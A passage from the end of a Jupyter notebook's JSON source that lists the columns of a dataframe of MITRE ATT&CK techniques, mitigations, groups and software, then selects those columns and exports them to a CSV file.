" 'system_requirements',\n",
" 'tactic',\n",
" 'tactic_type',\n",
" 'technique',\n",
" 'technique_description',\n",
" 'technique_id',\n",
" 'technique_references',\n",
" 'url']"
]
},
"execution_count": 28,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"list(df)"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"### We can then export All ATT&CK as a CSV file"
]
},
{
"cell_type": "code",
"execution_count": 29,
"metadata": {},
"outputs": [],
"source": [
"df = df[[\n",
" 'matrix','tactic','technique','technique_id','technique_description',\n",
" 'mitigation','mitigation_description','group','group_id','group_aliases',\n",
" 'group_description','software','software_id','software_description','software_labels',\n",
" 'relationship_description','platform','data_sources','detectable_by_common_defenses','detectable_explanation',\n",
" 'difficulty_for_adversary','difficulty_explanation','effective_permissions','network_requirements','permissions_required',\n",
" 'remote_support','system_requirements','contributors','url']]"
]
},
{
"cell_type": "code",
"execution_count": 30,
"metadata": {},
"outputs": [],
"source": [
"df.to_csv('all_attack.csv',index=False,encoding='utf-8')"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {},
"outputs": [],
"source": []
}
],
"metadata": {
"kernelspec": {
"display_name": "Python 3",
"language": "python",
"name": "python3"
},
"language_info": {
"codemirror_mode": {
"name": "ipython",
"version": 3
},
"file_extension": ".py",
"mimetype": "text/x-python",
"name": "python",
"nbconvert_exporter": "python",
"pygments_lexer": "ipython3",
"version": "3.6.5"
}
},
"nbformat": 4,
"nbformat_minor": 2
}